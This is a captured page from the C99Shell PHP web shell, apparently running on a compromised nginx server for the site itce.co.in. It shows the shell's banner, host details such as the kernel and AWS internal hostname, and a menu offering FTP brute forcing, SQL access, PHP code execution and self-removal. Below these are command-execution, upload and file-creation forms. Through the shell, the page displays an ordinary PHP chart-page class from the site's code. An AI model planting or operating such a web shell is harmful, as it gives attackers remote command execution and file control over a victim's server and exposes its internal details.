!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/data/classes/   drwxr-xr-x
Free 30.74 GB of 49.93 GB (61.58%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     chartpage_master.php (2.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Class for list page with mode simple
 *
 */
class ChartPage_Master extends ChartPage 
{
    
/**
     * Constructor, set initial params
     *
     * @param array $params
     */    
    
function __construct(&$params
    {
        
// call parent constructor
        
parent::__construct($params);
    }

    public function 
getMasterHeading() 
    {
        
$this->xt->assign"masterlist_title"true );
        return 
$this->xt->fetch_loaded"masterlist_title" );
    }

    public function 
preparePage() 
    {
        if( !
$this->masterRecordData || !count($this->masterRecordData) )
            return;

        
$this->xt->assign("chart_block"true);        
        
$this->assignChartElement();

        
$this->xt->assign("pagetitlelabel"$this->getPageTitle$this->pageTypeGoodFieldName($this->tName), $this->masterRecordData ));    

        
$tKeys $this->pSet->getTableKeys();
        
$keylink "";

                
        for(
$i 0$i count($tKeys); $i ++) {
            
$keylink.= "&key".($i 1)."=".runner_htmlspecialchars(rawurlencode(@$this->masterRecordData[$tKeys[$i]]));
        }
        
        
$fields $this->pSet->getMasterListFields();
        
$fields array_merge$fields$tKeys);
        foreach( 
$fields as $f )
        {
            
$fieldClassStr $this->fieldClass($f);
            
$this->xt->assignGoodFieldName$f ) . "_mastervalue""<span class='"$fieldClassStr ."'>".$this->showDBValue$f$this->masterRecordData$keylink)."</span>");
            
$this->xt->assignGoodFieldName$f ) . "_class"$fieldClassStr); // add class for field header as field value
        
}
            
        if( 
$this->pageLayout )
            
$this->xt->assign("pageattrs"'class="'.$this->pageLayout->style." page-".$this->pageLayout->name.'"');
        
        if( 
$this->pageLayout )
            
$this->xt->assign("pageattrs"'class="'.$this->pageLayout->style." page-".$this->pageLayout->name.'"');
        
        
//$this->xt->load_template( GetTemplateName($this->shortTableName, "masterchart") );
        
$this->xt->load_template$this->templatefile );
    }

    public function 
showMaster$params 
    {

        if( !
$this->masterRecordData || !count($this->masterRecordData) )
            return;

        
$this->xt->assign"masterlist_title"false );
        
$this->xt->display_loaded();
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.002 ]--